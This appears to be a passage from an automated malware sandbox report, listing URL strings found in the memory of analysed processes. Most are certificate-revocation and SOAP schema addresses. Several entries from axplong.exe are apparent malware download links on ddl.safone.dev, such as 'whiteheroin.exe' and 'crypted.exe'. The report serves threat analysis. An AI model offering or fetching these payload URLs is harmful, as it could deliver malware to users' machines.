Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: axplong.exe, 00000006.00000002.3380519963.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3803980/whiteheroin.exe?hash=AgADjF
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3803980/whiteheroin.exe?hash=AgADjF0
Source: axplong.exe, 00000006.00000002.3380519963.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZl
Source: axplong.exe, 00000006.00000002.3380519963.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZlR_
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3827530/caesium-image-compressor.exe?hash=AgADPx
Source: axplong.exe, 00000006.00000002.3411734873.0000000005A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddl.safone.dev/3830515/PureSyncInst.exe?hash=AgADvR
Source: BitcoinCore.exe, 00000017.00000000.2965300138.0000000000B2C000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: runtime.exe, 00000019.00000002.3146644374.0000000000408000.00000002.00000001.01000000.0000001C.sdmp, runtime.exe, 00000019.00000000.3137241849.0000000000408000.00000002.00000001.01000000.0000001C.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net02
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9p
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
